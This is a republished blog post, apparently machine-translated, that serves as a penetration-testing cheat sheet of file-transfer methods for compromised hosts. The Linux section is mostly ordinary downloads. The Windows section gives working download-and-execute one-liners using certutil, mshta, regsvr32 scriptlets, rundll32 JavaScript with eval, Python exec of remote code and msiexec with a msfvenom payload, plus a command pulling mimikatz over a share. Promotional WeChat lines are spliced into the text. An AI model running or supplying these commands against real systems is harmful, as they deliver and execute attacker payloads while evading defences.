1 Introduction
In the process of our penetration testing, it is usually necessary to transfer some files to the target host to achieve privilege escalation and maintain control. Therefore, when it is inconvenient to perform direct transmission, and the target host can have a network connection, then at this time you can download This method achieves the purpose of file transfer. In this article, I will discuss win and linux Most of the download instructions are used to make a summary, there may be omissions, but the summary is often used.
2. Linux
2.1 Wget
This tool is very feature-rich and acts as a sort of full-featured GUI download manager , it has all the features that an ideal download manager needs, such as it can resume downloads, download multiple files, retry downloads after a certain connection problem, and you can even manage the maximum download bandwidth.
Download:
copywget http://www.sample-videos.com/video/mp4/big.mp4
Background download:
copywget -b http://www.sample-videos.com/video/mp4/big.mp4
To resume the download if the internet connection is interrupted:
copywget -c http://www.sample-videos.com/video/mp4/big.mp4
Download a file from a password-protected ftp repository:
copywget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address
2.2 Curl
Curl is another efficient download tool that can be used to upload or download files with a single simple command. It supports pausing and resuming downloading packages, and supports the largest number of Web protocols, can predict how much time is left to download, and can display the download progress through a progress bar. It is a built-in tool of all Linux distributions.
Download:
copycurl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4
With the -o option, provide a name and the downloaded file will be saved with that name; with the -O option, the file will be saved with the original name.
2.3 Axel
This is a great alternative to wget and is a lightweight download utility. It's actually an accelerator, because it opens multiple http connections to download individual file segments, so the file downloads faster.
copyapt-get install axel
Download:
copyaxel http://www.sample-videos.com/video/mp4/big.mp4
2.4 Aria2
This is an open source command-line download accelerator that supports multiple ports and allows you to use the maximum bandwidth to download files. It is an easy-to-install and easy-to-use tool.
copyapt-get install aria2
Download:
copyaria2c http://www.sample-videos.com/video/mp4/big.mp4
2.5 Perl
Perl is an awesome language, you can do almost anything with it, and it's easy to do file downloads with it.
#!perl
#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");Execute the script file like this:
copyperl test.pl
2.6 Python
Python is also a popular mainstream scripting language with clear and concise code:
#!python
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()2.7 Ruby
Ruby is an object-oriented language that the Metasploit framework uses to implement it, and of course it can also implement small tasks like downloading files. WeChat search public account: front-end technical programming, reply: front-end to receive information.
#!ruby
#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
r = http.get("/file")
open("save_location", "wb") { |file|
file.write(r.body)
}
}Execute the script file like this;
copyruby test.rb
2.8 PHP
As a server-side script, PHP can also implement the function of downloading files.
#!/usr/bin/php
<?php
$data = @file("http://example.com/file");
$lf = "local_file";
$fh = fopen($lf, 'w');
fwrite($fh, $data[0]);
fclose($fh);
?>Execute the script file like this:
copyphp test.php
2.9 FTP
Under normal circumstances, attackers need many interactive steps to upload files using FTP. The following bash script, taking into account the interaction, can be executed directly without generating interactive actions.
copyftp 127.0.0.1 username password get file exit
Of course, you can also enter the interactive terminal according to the actual situation:
copyftp 192.168.3.2 After entering username and password lcd E:\file # Enter the file directory under the E drive cd www # Go to the www directory on the server get access.log # Download the access.log on the server to E:\file
2.10 Netcat
On the attacker's computer, enter:
copycat file | nc -l 1234
This command will output the content of the file to the local port 1234, and then no matter who connects to this port, the content of the file will be sent to the connected IP.
Command on the target computer:
copync host_ip 1234 > file
This command will connect to the attacker's computer and accept the file content to save.
3. Windows
3.1 Powershell
PowerShell is a native scripting language of winodws. For those who are proficient in using it, it can realize many complex functions.
The following two commands implement downloading a file from the Internet.
$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file" "C:\%homepath%\file")3.2 IPC$
copycopy \192.168.3.1\c$\test.exe E:\file cmd.exe /k < \webdavserver\folder\batchfile.txt
3.3 Certutil
Applicable to: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2
copycertutil -urlcache -split -f http://192.168.3.1/test.exe file.exe certutil -urlcache -split -f http://192.168.3.1/test.exe delete #Delete cache certutil -verifyctl -split -f -split http://192.168.3.1/test.exe #This command will download the original file as a temporary bin file, and it can run normally after changing the name back
The file is downloaded and executed as follows:
copycertutil -urlcache -split -f http://site.com/a a.exe && a.exe && del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
3.4 Visual Basic
In 1998 the Visual Basic final standard was finalized on windows. The following code can download the file, although it is much longer than Powershell. WeChat search public account: Architect Guide, reply: Architect to receive information.
Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
.type = 1 '
.open
.write xHttp.responseBody
.savetofile " C:\%homepath%\file", 2 '
end withIn windows, the Cscript command can allow you to execute VBS script files or make some settings for script scripts. In windows 7 this command is not required. But you need to use this command in windows XP, as follows:
copycscript test.vbs
3.5 Tftp
In Windows Vista and later there is FTP by default, which can be run with the following command:
Upload:
copytftp -i IP address PUT C:\%homepath%\file remote storage location
download:
copytftp -i IP address GET C:\%homepath%\file local storage location
3.6 Bitsadmin
Bitsadmin is a Windows command-line tool that users can use to create download or upload tasks. Only the command can be downloaded to the specified path, win7 or above:
copybitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\\phpstudy_pro\\WWW\\b.ps1" bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt bitsadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:\file\test.txt
3.7 msiexec
copymsiexec /q /i http://192.168.3.1/calc.png calc.png: msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png
3.8 IEExec
copyC:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec http://192.168.3.1/test.exe
3.9 Python
C:\python27\python.exe -c "import urllib2; exec urllib2.urlopen('http://192.168.3.1/test.zip').read();"3.10 Mshta
mshta http://192.168.3.1/run.hta The content of run.hta is as follows:
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c net user" // Fill in the command here
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))3.11 Rundll32
Depends on the WScript.shell component:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%3.12 Regsvr32
The Regsvr32 command is used to register COM components. It is a command provided by the Windows system to register controls with the system or uninstall controls. It is run in command line mode.
The regsvr32.exe of WinXP and above systems is in the windows\system32 folder; the regsvr32.exe of the 2000 system is in the winnt\system32 folder.
copyregsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll
test.data content:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>can also use
https://github.com/CroweCybersecurity/ps1encode generates sct files:
copyregsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll
3.13 Windows Share
Windows shares can mount a drive and then use commands to copy files.
Load the remote driver:
copynet use x: \\127.0.0.1\share /user:example.com\userID myPassword
3.14 Format conversion
When you need to put an exe file on the target computer, Nishang can use PowerShell to allow you to convert an exe to hex, and then convert the hex back to the original exe file:
Convert exe to hex file input:
copyPS > .\ExetoText.ps1 evil.exe evil.txt
Open the evil.txt file, copy the content, and then copy it to the target computer through the RDP clipboard, restore the hex file to an exe file and enter:
copyPS > .\TexttoExe.ps1 evil.text evil.exe
3.15 Others
1.MSXSL.EXE
msxsl.exe is a program used by Microsoft to process XSL under the command line, so through him, we can execute JavaScript and then execute system commands.
2.pubprn.vbs
On Windows 7+ there exists a Microsoft signed WSH script named PubPrn.vbs located at
copyC:\Windows\System32\Printing_Admin_Scripts\en-US
3.esentutl.exe/extrac32.exe
copyesentutl.exe /y "\\172.16.249.149\share mimikatz_trunk.zip" /d"C:\Users\Public\mimikatz_trunk.zip" /0 extrac32.exe /Y /C \\172.16.249.149\share\test.txt C:\Users\Public\test.txt
script
4.desktopimgdownldr.exe
desktopimgdownldr.exe is located in the system32 folder of Win10 and was originally used to set the lock screen or desktop background image.
Ordinary users can use:
copyset "SYSTEMROOT=C:\ProgramData" && cmd /c desktopimgdownldr.exe /lockscreenurl:http://url/xxx.exe /eventName:desktopimgdownldr
This will download the file.
Download file method
You can change C:\ProgramData to a directory writable by ordinary users.
The downloaded files are stored in:
copyC:\ProgramData\Personalization\LockScreenImage\x_%random%.exe.
file location
Admin users will write one more registry entry, so the best command for an admin is:
copyset "SYSTEMROOT=C:\ProgramData\" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://url/file.exe /eventName:desktopimgdownldr && reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /f
------The content of this page is over, please share if you like ------
© Copyright Notice
Disclaimer 1 The name of this website: Do not read blog 2 Permanent website of this site: www.bunian.cn 3 Some of the content of the articles on this website may come from the Internet and are for your study and reference only. If there is any infringement, please contact the webmaster to delete it. 4 All resources on this site do not represent the position of this site, nor does it mean that this site agrees with its views and is responsible for its authenticity. 5 This site is strictly prohibited from publishing or reprinting any illegal related information in any way. If visitors find it, please report it to the webmaster. 6 Most of the resources on this site are stored in the cloud disk. If you find that the link is invalid, please contact us and we will update it as soon as possible.